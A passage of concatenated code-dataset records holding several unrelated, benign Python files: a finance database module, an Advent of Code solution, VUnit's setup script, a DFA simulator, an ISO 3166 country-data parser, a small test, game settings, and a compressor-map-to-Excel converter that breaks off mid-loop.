try:\n d = datetime.datetime.strptime(d, '%Y-%m-%d')\n except TypeError:\n raise DateError('Error in date')\n\n try:\n int_tr_id = int(trn_t_id)\n except ValueError:\n raise TrnTypeIdError('Ошибка идентификатора вида расходов//расходов')\n\n try:\n float_val = float(val)\n except ValueError:\n raise InputError('Неверный формат суммы')\n\n try:\n int_acc_fr = int(acc_fr)\n except ValueError:\n raise InputError('Счет отправки не существует')\n\n if int_tr_id == 2 or (trn_t_id == 3 and int_acc_fr == 1):\n new_balance = get_balance() - float_val\n elif int_tr_id == 3 and int_acc_fr == 2:\n new_balance = get_sber_balance() - float_val\n else:\n new_balance = 0\n\n if new_balance < 0:\n raise BalanceBelowZeroError('Баланс не может быть меньше нуля')\n\n try:\n sql_for_adding_trans = '''INSERT INTO transaction(user_id, transacion_type_id, \n purchase_id, date, value, account_from_id, comment)\n VALUES(:v1, :v2, :v3, :v4, :v5, :v6, :v7)'''\n db_session.execute(sql_for_adding_trans, {'v1': usr, 'v2': trn_t_id,\n 'v3': prc_id, 'v4': d,\n 'v5': val, 'v6': acc_fr, 'v7': comment})\n db_session.commit()\n except ValueError:\n raise DateError\n except Exception:\n db_session.rollback()\n raise SQLError('Error in SQL-code')\n\n\ndef get_transactions_per_day(date_parameters: dict):\n \"\"\"Selects transactions per day\"\"\"\n sql_for_tr_per_day = '''SELECT t_t.name tt_id, \n CONCAT(g.name, ' - ', p.name) group_purchase, u.fname, t.value\n FROM transaction t \n INNER JOIN transacion_type t_t ON t.transacion_type_id = t_t.transacion_type_id\n INNER JOIN purchase p ON t.purchase_id = p.purchase_id\n INNER JOIN group_goods g ON p.group_goods_id = g.group_goods_id\n INNER JOIN user u ON t.user_id = u.user_id\n WHERE t.date = :u1'''\n try:\n tr_per_day = db_session.execute(sql_for_tr_per_day, {'u1': datetime.date(int(date_parameters['y']),\n int(date_parameters['m']),\n int(date_parameters['d']))}).fetchall()\n except ValueError:\n raise DateError\n\n return tr_per_day\n\n\ndef get_trans_type():\n \"\"\"Selects all transaction types\"\"\"\n return db_session.execute('SELECT transacion_type_id, name FROM transacion_type').fetchall()\n\n\ndef get_owner():\n \"\"\"Selects all users from user\"\"\"\n return db_session.execute('SELECT user_id, fname FROM user').fetchall()\n\n\ndef get_month_values(fday, lday, trn_type_id):\n \"\"\"Selects incomes/costs per month\"\"\"\n sql_for_month_values = '''SELECT g.name g_name, SUM(value) sum_value\n FROM transaction t \n INNER JOIN purchase p ON t.purchase_id = p.purchase_id \n INNER JOIN group_goods g ON p.group_goods_id = g.group_goods_id\n WHERE t.date BETWEEN :w1 AND :w2\n AND t.transacion_type_id = :w3\n GROUP BY 1 ORDER BY 2 DESC;'''\n return db_session.execute(sql_for_month_values, {'w1': fday, 'w2': lday, 'w3': trn_type_id}).fetchall()\n\n\ndef get_top(fday, lday):\n \"\"\"Show top purchases per month\"\"\"\n sql_for_top = '''SELECT CONCAT(g.name, ' - ', p.name) p_name, SUM(t.value) val FROM transaction t\n INNER JOIN purchase p ON t.purchase_id = p.purchase_id\n INNER JOIN group_goods g ON p.group_goods_id = g.group_goods_id \n WHERE t.date BETWEEN :w1 AND :w2\n AND t.transacion_type_id = 2 AND t.save_money = 'N'\n GROUP BY p.name \n ORDER BY 2 DESC LIMIT 10;'''\n return db_session.execute(sql_for_top, {'w1': fday, 'w2': lday}).fetchall()\n\n\ndef get_last_months_purchase(m_for_show=6, datepar='NOW()'):\n \"\"\"Getting incomes and costs grouped by month\"\"\"\n sql_for_exec = '''SELECT MONTH(t.date) month,\n ( SELECT SUM(t1.value) FROM transaction t1 WHERE t1.transacion_type_id = 1 AND t1.save_money = 'N'\n AND MONTH(t1.date) = MONTH(t.date) AND YEAR(t1.date) = YEAR(t.date) GROUP BY YEAR(t1.date), MONTH(t1.date) ) incomes,\n ( SELECT SUM(t2.value) FROM transaction t2 WHERE t2.transacion_type_id = 2 AND t2.save_money = 'N'\n AND MONTH(t2.date) = MONTH(t.date) AND YEAR(t2.date) = YEAR(t.date) GROUP BY YEAR(t2.date), MONTH(t2.date) ) costs\n FROM transaction t\n WHERE date BETWEEN DATE_SUB(DATE(:w2), INTERVAL :w1 MONTH) AND DATE(:w2)\n GROUP BY YEAR(t.date), MONTH(t.date);'''\n return db_session.execute(sql_for_exec, {'w1': m_for_show, 'w2': datepar}).fetchall()\n\n\ndef get_balance(last_month=datetime.date.today().month, last_year=datetime.date.today().year):\n \"\"\"Get balance of account\"\"\"\n sql_for_balance = '''SELECT\n (SELECT IFNULL(SUM(t1.value), 0) FROM transaction t1 \n WHERE MONTH(t1.date) <= :w1 AND YEAR(t1.date) <= :w2\n AND t1.transacion_type_id = 1 AND t1.save_money = 'N') -\n (SELECT IFNULL(SUM(t2.value), 0) FROM transaction t2 \n WHERE MONTH(t2.date) <= :w1 AND YEAR(t2.date) <= :w2\n AND t2.transacion_type_id = 2 AND t2.save_money = 'N') balance;'''\n res = db_session.execute(sql_for_balance, {'w1': last_month, 'w2': last_year}).fetchall()[0][0] - get_sber_balance()\n return res if res is not None else 0\n\n\ndef get_accounts():\n \"\"\"Get accounts\"\"\"\n sql_for_accs = '''SELECT * FROM account;'''\n return db_session.execute(sql_for_accs).fetchall()\n\n\ndef get_sber_balance(m=datetime.date.today().month, y=datetime.date.today().year):\n \"\"\"Get sber balance\"\"\"\n sql_for_sber_balance = '''SELECT\n (SELECT IFNULL(SUM(t1.value), 0) FROM transaction t1 \n WHERE MONTH(t1.date) = :w1 AND YEAR(t1.date) = :w2 AND t1.transacion_type_id = 3 \n AND t1.account_from_id = 1) - \n (SELECT IFNULL(SUM(t2.value), 0) FROM transaction t2\n WHERE MONTH(t2.date) = :w1 AND YEAR(t2.date) = :w2 AND t2.transacion_type_id = 3\n AND t2.account_from_id = 2) sber_bal'''\n res = db_session.execute(sql_for_sber_balance, {'w1': m, 'w2': y}).fetchall()[0][0]\n return res if res is not None else 0\n\n\ndef get_sber_transactions(m, y):\n \"\"\"Get operions for current period\"\"\"\n sql_for_sber_trns = '''SELECT t.date, a.name, t.comment, u.fname, t.value FROM transaction t\n INNER JOIN account a ON t.account_from_id = a.account_id\n INNER JOIN user u ON t.user_id = u.user_id\n WHERE MONTH(t.date) = :w1 AND YEAR(t.date) = :w2\n AND transacion_type_id = 3 ORDER BY t.date'''\n return db_session.execute(sql_for_sber_trns, {'w1': m, 'w2': y}).fetchall()\n\n\ndef get_planning_parameters(pl_gr_id='OPT', cur_date='DATE_FORMAT(CURDATE(), %Y-%m-01', with_pur_id=False):\n \"\"\"Get planning parameters for current month\"\"\"\n sql_select_part = '''SELECT CONCAT(g.name, ' - ', p.name) pp_name, IFNULL(pp.planning_date, 'Нет даты') pp_date, \n pp.pp_val pp_val'''\n sql_from_part = '''\n FROM planning_parameter pp \n INNER JOIN purchase p ON pp.purchase_id = p.purchase_id\n INNER JOIN group_goods g ON p.group_goods_id = g.group_goods_id\n WHERE p.planning_group_pl_gr_id = :w2\n AND pp.date_from <= :w3 AND pp.date_to > :w3'''\n if with_pur_id:\n sql_select_part += ', pp.purchase_id pp_pur_id'\n sql_for_pp = sql_select_part + sql_from_part\n return db_session.execute(sql_for_pp, {'w2': pl_gr_id,\n 'w3': cur_date}).fetchall()\n\n\ndef get_planning_sums_by_user(limit=2, tr_type_id=1, cur_date='DATE_FORMAT(CURDATE(), %Y-%m-01'):\n \"\"\"Get planning earnings per user\"\"\"\n sql_for_sums_by_user = '''SELECT u.fname username, SUM(pp.pp_val) FROM planning_parameter pp INNER JOIN user u\n ON pp.user_id = u.user_id\n WHERE pp.purchase_id IN (SELECT p.purchase_id FROM purchase p INNER JOIN group_goods g\n ON p.group_goods_id = g.group_goods_id WHERE g.transacion_type_id = :w2)\n AND pp.date_from <= :w3 AND pp.date_to > :w3\n GROUP BY u.fname LIMIT :w1;'''\n return db_session.execute(sql_for_sums_by_user, {'w1': limit,\n 'w2': tr_type_id,\n 'w3': cur_date}).fetchall()\n\n\ndef get_planning_groups():\n \"\"\"Show planning groups\"\"\"\n return db_session.execute('''SELECT pl_gr_id, name FROM planning_group''').fetchall()\n\n\ndef update_planning_from_json(json_obj, date_of_planning):\n \"\"\"Updating planning parameters from JSON-object\"\"\"\n sql_for_updating = 'CALL edit_planning_parameter(:w1, :w2, :w3, :w4, :w5)'\n planning_user = 1\n for json_row in json_obj:\n if re.match(r'^\\d{4}-\\d{2}-\\d{2}', json_row['pp_date']) is None:\n json_row['pp_date'] = None\n try:\n db_session.execute(sql_for_updating, {'w1': json_row['pp_val'],\n 'w2': date_of_planning,\n 'w3': json_row['pp_name'],\n 'w4': json_row['pp_date'],\n 'w5': planning_user})\n db_session.commit()\n except Exception:\n db_session.rollback()\n raise SQLError('Cannot write in db')\n\n\nclass SQLError(Exception):\n pass\n\n\nclass DateError(Exception):\n pass\n\n\nclass TrnTypeIdError(Exception):\n pass\n\n\nclass BalanceBelowZeroError(Exception):\n pass\n\n\nclass InputError(Exception):\n pass\n","repo_name":"gurchz/Moneykeeper","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":11637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70044891364","text":"elves = []\nwith open(\"input.txt\") as infile:\n elf = []\n for calories in infile:\n if calories == \"\\n\":\n elves.append(elf)\n elf = []\n else:\n elf.append(int(calories.rstrip()))\n\n if elf:\n elves.append(elf)\n\ncalorie_sums = [ sum(calories) for calories in elves ]\nprint(max(calorie_sums))\n","repo_name":"diwasrimal/AOC","sub_path":"01/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26625642807","text":"import os\nimport sys\nfrom pathlib import Path\nfrom logging import warning\nfrom setuptools import setup\n\n# Ensure that the source tree is on the sys path\nsys.path.insert(0, str(Path(__file__).parent.resolve()))\n\nfrom vunit.about import version, doc # pylint: disable=wrong-import-position\nfrom vunit.builtins import osvvm_is_installed # pylint: disable=wrong-import-position\n\n\ndef find_all_files(directory, endings=None):\n \"\"\"\n Recursively find all files within directory\n \"\"\"\n result = []\n for root, _, filenames in os.walk(directory):\n for filename in filenames:\n ending = os.path.splitext(filename)[-1]\n if endings is None or ending in endings:\n result.append(str(Path(root) / filename))\n return result\n\n\nDATA_FILES = []\nDATA_FILES += find_all_files(\"vunit\", endings=[\".tcl\"])\nDATA_FILES += find_all_files(str(Path(\"vunit\") / \"vhdl\"))\nDATA_FILES += find_all_files(str(Path(\"vunit\") / \"verilog\"), endings=[\".v\", \".sv\", \".svh\"])\nDATA_FILES = [os.path.relpath(file_name, \"vunit\") for file_name in DATA_FILES]\n\nsetup(\n name=\"vunit_hdl\",\n version=version(),\n packages=[\n \"tests\",\n \"tests.lint\",\n \"tests.unit\",\n \"tests.acceptance\",\n \"vunit\",\n \"vunit.com\",\n \"vunit.parsing\",\n \"vunit.parsing.verilog\",\n \"vunit.sim_if\",\n \"vunit.test\",\n \"vunit.ui\",\n \"vunit.vivado\",\n ],\n package_data={\"vunit\": DATA_FILES},\n zip_safe=False,\n url=\"https://github.com/VUnit/vunit\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)\",\n \"Natural Language :: English\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: POSIX :: Linux\",\n \"Topic :: Software Development :: Testing\",\n \"Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)\",\n ],\n python_requires=\">=3.6\",\n install_requires=[\"colorama\"],\n requires=[\"colorama\"],\n license=\"Mozilla Public License 2.0 (MPL 2.0)\",\n author=\"Lars Asplund\",\n author_email=\"lars.anders.asplund@gmail.com\",\n description=\"VUnit is an open source unit testing framework for VHDL/SystemVerilog.\",\n long_description=doc(),\n)\n\nif not osvvm_is_installed():\n warning(\n \"\"\"\nFound no OSVVM VHDL files. If you're installing from a Git repository and plan to use VUnit's integration\nof OSVVM you should run\n\ngit submodule update --init --recursive\n\nin your VUnit repository before running setup.py.\"\"\"\n )\n","repo_name":"VUnit/vunit","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":651,"dataset":"github-code","pt":"52"} +{"seq_id":"27219979565","text":"\"\"\"\nSimple main to initialize a dfa and test input strings.\nRead from input until empty string is read, then terminate\n\"\"\"\nimport sys\nfrom dfa import DFA\n\nif __name__ == '__main__':\n A_DFA = DFA(sys.argv[1])\n IN_FILE = open(sys.argv[2])\n IN_STRING = IN_FILE.readline().replace('\\n', '')\n while IN_STRING != '':\n A_DFA.check_string(IN_STRING)\n IN_STRING = IN_FILE.readline().replace('\\n', '')\n","repo_name":"Kronemeyer/Foundations-of-Computation-DFA","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43354437987","text":"import re\nimport csv\nfrom collections import namedtuple\nfrom _utility.get_package_dir import get_package_dir\n\n\nCoord = namedtuple('Coord', [\n 'lat', 'long'\n])\n\nISO3166 = namedtuple('ISO3166', [\n 'a2', 'a3', 'n3'\n])\n\nCOWItem = namedtuple('COWItem', [\n 'iso3166',\n 'fips104',\n 'has_capital',\n 'continent',\n 'subcontinent',\n 'language',\n 'population',\n 'year',\n 'conventional_abbreviation',\n 'international_dialing_code',\n 'international_vehicle_code',\n\n 'area',\n 'coords',\n 'max_coords',\n 'min_coords',\n\n 'iso',\n 'un',\n 'ungegn',\n 'bgn',\n 'pcgn',\n 'fao',\n 'eki',\n 'url',\n])\n\n\ndef _get_data_items():\n r = []\n\n f = open(get_package_dir() / 'misc_data_scripts' / 'other_data' / 'iso_3166_1' / 'cow.csv',\n 'r', encoding='utf-8')\n\n for item in csv.DictReader(\n filter(lambda row: row[0]!='#', f),\n delimiter=';'\n ): \n for k in item:\n item[k] = item[k].strip()\n \n r.append(COWItem(**dict(\n iso3166=ISO3166(\n a2=item['ISO3166A2'],\n a3=item['ISO3166A3'],\n n3=item['ISO3166N3']\n ),\n fips104=item['FIPS104'],\n\n has_capital=item['HasCapital'],\n continent=item['continent'],\n subcontinent=item['subcontinent'],\n language=item['language'],\n population=int(item['population']),\n year=item['year'],\n conventional_abbreviation=item['conabbr'],\n\n international_dialing_code=item['ITU'],\n international_vehicle_code=item['IVC'],\n\n area=dict(\n land=item['land'],\n water=item['water'],\n lang_total=item['land_total']\n ),\n coords=Coord(\n float(item['latitude']),\n float(item['longitude'])\n ),\n max_coords=Coord(\n float(item['maxlatitude']),\n float(item['maxlongitude'])\n ),\n min_coords=Coord(\n float(item['minlatitude']),\n float(item['minlongitude'])\n ),\n\n iso=dict(\n name=dict(\n en=item['ISOen_name'],\n en_romanized=item['ISOen_ro_name'],\n fr=item['ISOfr_name'],\n es=item['ISOes_name']\n ),\n proper=dict(\n en=item['ISOen_proper'],\n en_romanized=item['ISOen_ro_proper'],\n fr=item['ISOfr_proper']\n ),\n region=dict(\n region=item['ISOregion'],\n subregion=item['ISOsubregion']\n )\n ),\n un=dict(\n en=item['UNen_capital'],\n fr=item['UNfr_capital'],\n es=item['UNes_capital'],\n ru=item['UNru_capital'],\n capital_coords=Coord(\n float(item['UNc_latitude']),\n float(item['UNc_longitude'])\n ) if item['UNc_latitude'].strip() else None\n ),\n ungegn=dict(\n name=dict(\n en=item['UNGEGNen_name'],\n fr=item['UNGEGNfr_name'],\n es=item['UNGEGNes_name'],\n ru=item['UNGEGNru_name'],\n native_romanized=item['UNGEGNlc_ro_name']\n ),\n longname=dict(\n en=item['UNGEGNen_longname'],\n fr=item['UNGEGNfr_longname'],\n es=item['UNGEGNes_longname'],\n ru=item['UNGEGNru_longname'],\n native_romanized=item['UNGEGNlc_ro_longname']\n ),\n capital_romanized=item['UNGEGNlc_capital'],\n ),\n bgn=dict(\n name=dict(\n en=item['BGN_name'],\n native_romanized=item['BGNlc_name']\n ),\n proper=dict(\n en=item['BGN_proper']\n ),\n longname=dict(\n en=item['BGN_longname'],\n en_romanized=item['BGNlc_longname']\n ),\n capital=item['BGN_capital'],\n capital_coords=Coord(\n float(item['BGNc_latitude']),\n float(item['BGNc_longitude'])\n ),\n demonym=item['BGN_demonym'],\n demonym_adjective=item['BGN_demomyn_adj']\n ),\n pcgn=dict(\n name=item['PCGN_name'],\n proper=item['PCGN_proper'],\n longname=item['PCGN_longname']\n ),\n fao=dict(\n name=item['FAOit_name'],\n proper=item['FAOit_proper'],\n longname=item['FAOit_longname']\n ),\n eki=dict(\n name=item['EKI_name'],\n longname=item['EKI_longname'],\n capital=item['EKI_capital']\n ),\n url=dict(\n url_gov=item['url_gov'],\n url_stats=item['url_stats'],\n url_gis=item['url_gis'],\n url_post=item['url_post']\n )\n )))\n\n return r\n\n\ndef _get_data_items_by_name():\n r = {}\n for i in _get_data_items():\n for en_name in (\n i.iso['name']['en'],\n i.iso['proper']['en'],\n i.un['en'],\n i.ungegn['name']['en'],\n i.ungegn['longname']['en'],\n i.bgn['name']['en'],\n i.bgn['proper']['en'],\n i.bgn['longname']['en']\n ):\n en_name = en_name.lower()\n if not en_name:\n continue\n\n assert r.get(en_name, i) == i, (en_name, i)\n r[en_name] = i\n\n en_name = re.sub(r'\\bthe|of|respublika|oblast|avtonomnyy okrug|okrug|republic\\b', '', en_name).strip().strip(',')\n while ' ' in en_name:\n en_name = en_name.replace(' ', ' ')\n r[en_name] = i\n return r\n\n\ndef _get_data_items_by_code():\n r = {}\n for i in _get_data_items():\n for code in (\n i.iso3166.a2,\n i.iso3166.a3,\n i.iso3166.n3\n ):\n code = code.lower()\n if not code:\n continue\n\n assert r.get(code, i) == i, (code, i)\n r[code] = i\n return r\n\n\n_data_items_by_name = _get_data_items_by_name()\n_data_items_by_code = _get_data_items_by_code()\n\n\ndef get_data_item_by_code(code):\n return _data_items_by_code[code.lower()]\n\n\ndef get_data_item_by_name(name):\n return _data_items_by_name[name.lower()]\n\n\nif __name__ == '__main__':\n from pprint import pprint\n pprint(_get_data_items_by_name())\n print(get_data_item_by_code('au'))\n print(get_data_item_by_code('usa'))\n print(get_data_item_by_name('australia'))\n","repo_name":"mcyph/world_subnational_covid_crawler","sub_path":"misc_data_scripts/other_data/iso_3166_1/iso_3166_data.py","file_name":"iso_3166_data.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"21452772811","text":"import inspect\nfrom typing import Dict, List, Union\n\nfrom demisto_sdk.commands.error_code_info import error_code_info\n\n\ndef test_parse_function_parameters():\n def dummy_func(\n param1: str, param2: Dict, param3: Union[str, List], param4: int = 0\n ):\n return f\"error with {param1}, {param2.items()}, {param3}, {param4 + 1}\", 1234\n\n sig = inspect.signature(dummy_func)\n parameters = error_code_info.parse_function_parameters(sig)\n\n assert parameters[\"param1\"] == \"\"\n assert parameters[\"param2\"] == error_code_info.TYPE_FILLER_MAPPING[dict]\n assert parameters[\"param3\"] == \"\"\n assert parameters[\"param4\"] == error_code_info.TYPE_FILLER_MAPPING[int]\n","repo_name":"demisto/demisto-sdk","sub_path":"demisto_sdk/commands/error_code_info/tests/error_code_info_test.py","file_name":"error_code_info_test.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"52"} +{"seq_id":"37670086191","text":"# screen settings\nscreen_width = 1000\nscreen_height = 700\nbg_color = (230, 230, 230)\nbg_image = 'images/sky.png'\nobject_flip_interv = 0.002\ngame_over_font_delay = 2\n\n# my ship's settings\nmy_ship_speed = 4\nmy_bullet_speed = 6\nmy_bullet_gen_interv = 0.6\n\n# enemy's settings\nenemy_gen_interv = 2\nenemy_ship_speed = 3\nenemy_stay_time = 3\nenemy_stay_top_position = 20\nenemy_bullet_speed = 4\nenemy_bullet_gen_interv = 1.5\n\n# reward's settings\nreward_gen_interv = 30\nreward_speed = 4\npower_up_image_src = 'images/powerup.png'\n","repo_name":"JohnsonEEE/ShootAircraft","sub_path":"src/firstgame/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4165985458","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nEditor: Akshay\r\n\r\nReference: https://www.gasturb.de/download.html (User manual guide for smooth c)\r\n\"\"\"\r\n\r\n\r\n\r\nimport glob\r\nfiles=(glob.glob(\"Z:\\\\compressordata\\\\*.txt\"))\r\n\r\nfor text in range(len(files)): \r\n text=files[text]\r\n filename = open(text, \"r\").readlines()\r\n result = list(filename)\r\n # print (result)\r\n #Line 1\r\n line =result[0]\r\n file_input = line.split()\r\n # Map_Type_Indicator\r\n Map_type= int(file_input[0])\r\n print(\"Map_Type_Indicator:\", Map_type)\r\n # Compressor_Name\r\n y= file_input[1:(len(file_input))]\r\n Compressor_Name = '_'.join(y)\r\n print(\"Compressor_Name:\", Compressor_Name)\r\n \r\n # create excel file with headers\r\n import xlsxwriter\r\n workbook = xlsxwriter.Workbook('Z:\\\\compressordata\\\\preprocessed_excel_files\\\\'+Compressor_Name+'.xlsx') \r\n worksheet = workbook.add_worksheet() \r\n \r\n worksheet.write(0,0,'Map_Type_Indicator') \r\n worksheet.write(0,1, 'Compressor_Name') \r\n worksheet.write(0,2, 'RefSpeed') \r\n worksheet.write(0,3, 'RefBeta')\r\n worksheet.write(0,4, 'RefMach')\r\n worksheet.write(0,5, 'RefPsi') \r\n worksheet.write(0,6, 'RefPhi') \r\n worksheet.write(0,7, 'No_of_speed_lines')\r\n worksheet.write(0,8, 'Keyword') \r\n worksheet.write(0,9, 'Speed') \r\n worksheet.write(0,10, 'No_of_points_1') \r\n worksheet.write(0,11, 'No_of_points_2')\r\n worksheet.write(0,12, 'Mass_flow') \r\n worksheet.write(0,13, 'Pressure_ratio') \r\n worksheet.write(0,14, 'Efficiency')\r\n worksheet.write(0,15, 'Surge_Mass_flow')\r\n worksheet.write(0,16, 'Surge_Pressure_ratio')\r\n worksheet.write(0,17, 'Surge_Efficiency')\r\n \r\n # Counting total number of lines\r\n file = open(text, \"r\")\r\n number_of_lines = 0\r\n for line in filename:\r\n line = line.strip(\"\\n\")\r\n number_of_lines += 1\r\n file.close()\r\n print(\"lines:\", number_of_lines)\r\n \r\n # Writing down map type and cmpressor name \r\n worksheet.write(1, 0, Map_type) \r\n worksheet.write_string(1, 1, Compressor_Name)\r\n \r\n with open(text) as f:\r\n if 'RefSpeed' in f.read():\r\n print(\"Output1\")\r\n #Line 2\r\n line =result[1]\r\n file_input = line.split()\r\n x=str(file_input[0])\r\n s1 = x[x.find('=') + 1: ]\r\n RefSpeed= str(s1)#RefSpeed\r\n print(\"RefSpeed:\", RefSpeed)\r\n worksheet.write(1, 2, RefSpeed) \r\n x=str(file_input[1])\r\n s1 = x[x.find('=') + 1: ]\r\n RefBeta= str(s1)#RefBeta\r\n print(\"RefBeta:\", RefBeta)\r\n worksheet.write(1, 3, RefBeta)\r\n #Line 3\r\n line =result[2]\r\n file_input = line.split()\r\n x=str(file_input[0])\r\n s1 = x[x.find('=') + 1: ]\r\n RefMach= str(s1)#RefMach\r\n print(\"RefMach:\", RefMach)\r\n worksheet.write(1, 4, RefMach)\r\n x=str(file_input[1]) \r\n s1 = x[x.find('=') + 1: ]\r\n RefPsi= str(s1)#RefPsi\r\n print(\"RefPsi:\", RefPsi)\r\n worksheet.write(1, 5, RefPsi)\r\n x=str(file_input[2])\r\n s1 = x[x.find('=') + 1: ]\r\n RefPhi= str(s1)#RefBeta\r\n print(\"RefPhi:\", RefPhi)\r\n worksheet.write(1, 6, RefPsi)\r\n \r\n #line4\r\n line =result[3]\r\n file_input = line.split()\r\n Map_Type_Indicator = len(file_input)\r\n # Number_of_speed_lines\r\n Number_of_speed_lines= int(file_input[0])\r\n print(\"Number_of_speed_lines:\", Number_of_speed_lines)\r\n worksheet.write(1, 7, Number_of_speed_lines)\r\n # Compressor_Name\r\n y= file_input[1:(len(file_input))]\r\n Keyword = ''.join(y)\r\n print(\"Keyword:\", Keyword)\r\n worksheet.write(1, 8, Keyword)\r\n \r\n line =result[4]\r\n file_input = line.split()\r\n points=int(file_input[1])#Since num points_1=num points_2, taking first one\r\n Num_speed_lines= Number_of_speed_lines\r\n low_limit=4\r\n z=low_limit\r\n y=0\r\n pt=0\r\n Press_ratio_arr=[]\r\n Mass_flow_arr=[]\r\n Efficiency_arr=[]\r\n Pts_upda=0\r\n #Writing down the speed lines and points \r\n for num1 in range(0, Num_speed_lines):\r\n x=num1\r\n line =result[low_limit]\r\n file_input = line.split()\r\n # speed\r\n speed= float(file_input[0])\r\n print(\"speed:\", speed)\r\n worksheet.write(Pts_upda+1, 9, speed)\r\n # points\r\n Num_points_1= int(file_input[1])\r\n print(\"Num_points_1:\", Num_points_1)\r\n worksheet.write(Pts_upda+1, 10, Num_points_1)\r\n Num_points_2= int(file_input[2])\r\n print(\"Num_points_2:\", Num_points_2)\r\n worksheet.write(Pts_upda+1, 11, Num_points_2)\r\n \r\n # to find the lower and upper limit\r\n z=z+pt+1\r\n y=z+points \r\n Pts_upda=Pts_upda + points\r\n for num in range(z, y): \r\n line =result[num]\r\n file_input = line.split()\r\n Press_ratio=float(file_input[0])\r\n Press_ratio_arr.append(Press_ratio)\r\n print(\"Press_ratio:\", Press_ratio)\r\n Mass_flow=float(file_input[1]) \r\n Mass_flow_arr.append(Mass_flow)\r\n print(\"Mass_flow:\", Mass_flow)\r\n Efficiency=float(file_input[2]) \r\n Efficiency_arr.append(Efficiency)\r\n print(\"Efficiency:\", Efficiency)\r\n \r\n low_limit=low_limit+points+1\r\n pt=points\r\n \r\n worksheet.write_column(1, 12, Press_ratio_arr)\r\n worksheet.write_column(1, 13, Mass_flow_arr) \r\n worksheet.write_column(1, 14, Efficiency_arr)\r\n with open(text) as k:\r\n if 'Surge Line' in k.read():\r\n # writing surge line\r\n p=5+Number_of_speed_lines+(points*Number_of_speed_lines)\r\n q=number_of_lines\r\n Pts_updat=0\r\n for num2 in range(p, q):\r\n line =result[num2]\r\n file_input = line.split()\r\n Press_ratio_surge=float(file_input[1])\r\n print(\"Press_ratio:\", Press_ratio_surge)\r\n Mass_flow_surge=float(file_input[2])\r\n print(\"Mass_flow:\", Mass_flow_surge)\r\n Efficiency_surge=float(file_input[3])\r\n print(\"Efficiency:\", Efficiency_surge)\r\n worksheet.write(Pts_updat+1, 15, Press_ratio_surge)\r\n worksheet.write(Pts_updat+1, 16, Mass_flow_surge) \r\n worksheet.write(Pts_updat+1, 17, Efficiency_surge)\r\n #Updating the points\r\n Pts_updat=Pts_updat + points\r\n else:\r\n p=5+Number_of_speed_lines+(points*Number_of_speed_lines)\r\n q=number_of_lines\r\n Pts_updat=0\r\n\r\n for num2 in range(p, q):\r\n line =result[num2] \r\n worksheet.write(Pts_updat+1, 15, 'null')\r\n worksheet.write(Pts_updat+1, 16, 'null') \r\n worksheet.write(Pts_updat+1, 17, 'null')\r\n #Updating the points\r\n Pts_updat=Pts_updat + points\r\n \r\n \r\n else:\r\n print(\"Output2\")\r\n #line1\r\n line =result[1]\r\n file_input = line.split()\r\n Map_Type_Indicator = len(file_input)\r\n #Since no reference values, all the unknown values are assigned to null\r\n worksheet.write(1, 2, 'null')\r\n worksheet.write(1, 3, 'null')\r\n worksheet.write(1, 4, 'null')\r\n worksheet.write(1, 5, 'null')\r\n worksheet.write(1, 6, 'null')\r\n # Number_of_speed_lines\r\n Number_of_speed_lines= int(file_input[0])\r\n print(\"Number_of_speed_lines:\", Number_of_speed_lines)\r\n worksheet.write(1, 7, Number_of_speed_lines)\r\n # Compressor_Name\r\n y= file_input[1:(len(file_input))]\r\n Keyword = ''.join(y)\r\n print(\"Keyword:\", Keyword)\r\n worksheet.write(1, 8, Keyword)\r\n \r\n line =result[2]\r\n file_input = line.split()\r\n points=int(file_input[1])\r\n Num_speed_lines= int(Number_of_speed_lines)\r\n low_limit=2\r\n z=low_limit\r\n y=0\r\n pt=0\r\n speed_upda=0\r\n Press_ratio_arr=[]\r\n Mass_flow_arr=[]\r\n Efficiency_arr=[]\r\n \r\n for num1 in range(0, Num_speed_lines):\r\n x=num1\r\n line =result[low_limit]\r\n file_input = line.split()\r\n # speed\r\n speed= float(file_input[0])\r\n print(\"speed:\", speed)\r\n worksheet.write(speed_upda+1, 9, speed)\r\n # Compressor_Name\r\n Num_points_1= int(file_input[1])\r\n print(\"Num_points_1:\", Num_points_1)\r\n worksheet.write(speed_upda+1, 10, Num_points_1)\r\n Num_points_2= int(file_input[2])\r\n print(\"Num_points_2:\", Num_points_2)\r\n worksheet.write(speed_upda+1, 11, Num_points_2)\r\n \r\n # to find the lower and upper limit\r\n z=z+pt+1\r\n y=z+points \r\n speed_upda=speed_upda + points\r\n #looping through the points\r\n for num in range(z, y): \r\n line =result[num]\r\n file_input = line.split()\r\n Press_ratio=float(file_input[0]) \r\n print(\"Press_ratio:\", Press_ratio)\r\n Press_ratio_arr.append(Press_ratio)\r\n Mass_flow=float(file_input[1]) \r\n Mass_flow_arr.append(Mass_flow)\r\n print(\"Mass_flow:\", Mass_flow)\r\n Efficiency=float(file_input[2])\r\n Efficiency_arr.append(Efficiency)\r\n print(\"Efficiency:\", Efficiency)\r\n 